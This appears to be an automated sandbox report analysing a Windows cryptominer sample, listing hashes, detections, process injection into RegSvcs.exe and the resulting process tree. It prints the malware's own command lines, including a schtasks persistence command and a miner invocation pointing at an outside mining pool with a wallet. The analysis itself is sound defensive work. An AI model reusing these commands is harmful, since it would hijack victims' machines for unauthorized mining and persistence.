Analysis
max time kernel: 133s
max time network: 136s
platform: windows10-2004_x64
resource: win10v2004-20220812-en
resource tags: arch:x64, arch:x86, image:win10v2004-20220812-en, locale:en-us, os:windows10-2004-x64, system
submitted: 30-09-2022 20:24
Static task: static1
Behavioral task: behavioral1
Sample: bbdf6022d12ea88e1fad8b6806e5353b407a12cac98b82e3742a6b6aef43d0a8.exe
Resource: win7-20220812-en
General
Target: bbdf6022d12ea88e1fad8b6806e5353b407a12cac98b82e3742a6b6aef43d0a8.exe
Size: 850KB
MD5: 617935448c3a5753762ac8c59d002b09
SHA1: 547c265e6940de4eaa9b756f3eabd44e5945b8aa
SHA256: bbdf6022d12ea88e1fad8b6806e5353b407a12cac98b82e3742a6b6aef43d0a8
SHA512: 88dfba3cc824a0430b14962395d0f5ed93eb559e077d9162b1d4577d1f8a1e2110a9e87b2e5eb928560f4f087964d923644b120c1b384b43f232c2b1ca6245de
SSDEEP: 6144:5tvrVv35gx/v6TTBgU5dsbopjLn5i2Lm8pbu5n+QKyX37RodENtQsEb8bKQdh/zH:HpvJKOdsKjL33e7RodvB5
Malware Config
Signatures
-
Detects Phoenix Miner Payload 2 IoCs
Processes (resource, yara_rule):
behavioral2/memory/900-148-0x0000000140000000-0x000000014082B000-memory.dmp  miner_phoenix
behavioral2/memory/900-149-0x0000000140000000-0x000000014082B000-memory.dmp  miner_phoenix
Executes dropped EXE 1 IoCs
Processes (pid, process):
308  ICELIUF.exe
Processes (resource, yara_rule):
behavioral2/memory/900-147-0x0000000140000000-0x000000014082B000-memory.dmp  upx
behavioral2/memory/900-146-0x0000000140000000-0x000000014082B000-memory.dmp  upx
behavioral2/memory/900-144-0x0000000140000000-0x000000014082B000-memory.dmp  upx
behavioral2/memory/900-148-0x0000000140000000-0x000000014082B000-memory.dmp  upx
behavioral2/memory/900-149-0x0000000140000000-0x000000014082B000-memory.dmp  upx
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes (description, ioc, process):
Key value queried  \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation  ICELIUF.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes (pid, process):
900  RegSvcs.exe
900  RegSvcs.exe
Suspicious use of SetThreadContext 1 IoCs
Processes (description, pid, process, target process):
PID 308 (ICELIUF.exe) set thread context of 900 (RegSvcs.exe)
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Delays execution with timeout.exe 1 IoCs
Processes (pid, process):
1532  timeout.exe
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes (pid, process):
308  ICELIUF.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes (description, pid, process):
Token: SeDebugPrivilege  3916  bbdf6022d12ea88e1fad8b6806e5353b407a12cac98b82e3742a6b6aef43d0a8.exe
Token: SeDebugPrivilege  308   ICELIUF.exe
Suspicious use of WriteProcessMemory 17 IoCs
Processes (description, pid, process, target process):
PID 3916 wrote to memory of 3768  bbdf6022d12ea88e1fad8b6806e5353b407a12cac98b82e3742a6b6aef43d0a8.exe -> cmd.exe
PID 3916 wrote to memory of 3768  bbdf6022d12ea88e1fad8b6806e5353b407a12cac98b82e3742a6b6aef43d0a8.exe -> cmd.exe
PID 3768 wrote to memory of 1532  cmd.exe -> timeout.exe
PID 3768 wrote to memory of 1532  cmd.exe -> timeout.exe
PID 3768 wrote to memory of 308   cmd.exe -> ICELIUF.exe
PID 3768 wrote to memory of 308   cmd.exe -> ICELIUF.exe
PID 308 wrote to memory of 3960   ICELIUF.exe -> cmd.exe
PID 308 wrote to memory of 3960   ICELIUF.exe -> cmd.exe
PID 3960 wrote to memory of 4320  cmd.exe -> schtasks.exe
PID 3960 wrote to memory of 4320  cmd.exe -> schtasks.exe
PID 308 wrote to memory of 900    ICELIUF.exe -> RegSvcs.exe
PID 308 wrote to memory of 900    ICELIUF.exe -> RegSvcs.exe
PID 308 wrote to memory of 900    ICELIUF.exe -> RegSvcs.exe
PID 308 wrote to memory of 900    ICELIUF.exe -> RegSvcs.exe
PID 308 wrote to memory of 900    ICELIUF.exe -> RegSvcs.exe
PID 308 wrote to memory of 900    ICELIUF.exe -> RegSvcs.exe
PID 308 wrote to memory of 900    ICELIUF.exe -> RegSvcs.exe
Processes (indentation shows the process tree depth)
C:\Users\Admin\AppData\Local\Temp\bbdf6022d12ea88e1fad8b6806e5353b407a12cac98b82e3742a6b6aef43d0a8.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\bbdf6022d12ea88e1fad8b6806e5353b407a12cac98b82e3742a6b6aef43d0a8.exe"
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
  C:\Windows\system32\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp649B.tmp.bat""
      - Suspicious use of WriteProcessMemory
    C:\Windows\system32\timeout.exe
        Command line: timeout 3
        - Delays execution with timeout.exe
    C:\ProgramData\System0\ICELIUF.exe
        Command line: "C:\ProgramData\System0\ICELIUF.exe"
        - Executes dropped EXE
        - Checks computer location settings
        - Suspicious use of SetThreadContext
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of WriteProcessMemory
      C:\Windows\System32\cmd.exe
          Command line: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "ICELIUF" /tr "C:\ProgramData\System0\ICELIUF.exe"
          - Suspicious use of WriteProcessMemory
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe
          Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe -pool ssl://eu1-etc.ethermine.org:5555 -wal 0xaC24bB4F74b2c83F3ACa168B71B5f45764a95e91.Rig001 -coin etc -log 0
          - Suspicious use of NtSetInformationThreadHideFromDebugger
C:\Windows\system32\schtasks.exe
    Command line: schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "ICELIUF" /tr "C:\ProgramData\System0\ICELIUF.exe"
    - Creates scheduled task(s)
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
C:\ProgramData\System0\ICELIUF.exe
    Filesize: 850KB
    MD5: 617935448c3a5753762ac8c59d002b09
    SHA1: 547c265e6940de4eaa9b756f3eabd44e5945b8aa
    SHA256: bbdf6022d12ea88e1fad8b6806e5353b407a12cac98b82e3742a6b6aef43d0a8
    SHA512: 88dfba3cc824a0430b14962395d0f5ed93eb559e077d9162b1d4577d1f8a1e2110a9e87b2e5eb928560f4f087964d923644b120c1b384b43f232c2b1ca6245de
C:\Users\Admin\AppData\Local\Temp\tmp649B.tmp.bat
    Filesize: 143B
    MD5: 7a401caf7b67769ec2f24e7ec9864a13
    SHA1: db535484b970a2eee23b86c8b082edb794adf90b
    SHA256: f48d93d97357c0e888c37efafeed1e3ded3b6aa55fecc1e96760598ca3fbbd96
    SHA512: ed58cb4c599716aaa4140f03f9725ce4e605d3fe1c5d90679489883a8e45d85f81acbefe9583c06bfe9f5ff4478783311b0675fb6951cf51af2fc384347a9bfe
memory/308-150-0x00007FFD78330000-0x00007FFD78DF1000-memory.dmp    Filesize: 10.8MB
memory/308-141-0x00007FFD78330000-0x00007FFD78DF1000-memory.dmp    Filesize: 10.8MB
memory/308-138-0x0000000000000000-mapping.dmp
memory/900-145-0x0000000140829C40-mapping.dmp
memory/900-147-0x0000000140000000-0x000000014082B000-memory.dmp    Filesize: 8.2MB
memory/900-146-0x0000000140000000-0x000000014082B000-memory.dmp    Filesize: 8.2MB
memory/900-144-0x0000000140000000-0x000000014082B000-memory.dmp    Filesize: 8.2MB
memory/900-148-0x0000000140000000-0x000000014082B000-memory.dmp    Filesize: 8.2MB
memory/900-149-0x0000000140000000-0x000000014082B000-memory.dmp    Filesize: 8.2MB
memory/1532-136-0x0000000000000000-mapping.dmp
memory/3768-134-0x0000000000000000-mapping.dmp
memory/3916-133-0x00007FFD784B0000-0x00007FFD78F71000-memory.dmp   Filesize: 10.8MB
memory/3916-137-0x00007FFD784B0000-0x00007FFD78F71000-memory.dmp   Filesize: 10.8MB
memory/3916-132-0x0000000000E90000-0x0000000000F68000-memory.dmp   Filesize: 864KB
memory/3960-142-0x0000000000000000-mapping.dmp
memory/4320-143-0x0000000000000000-mapping.dmp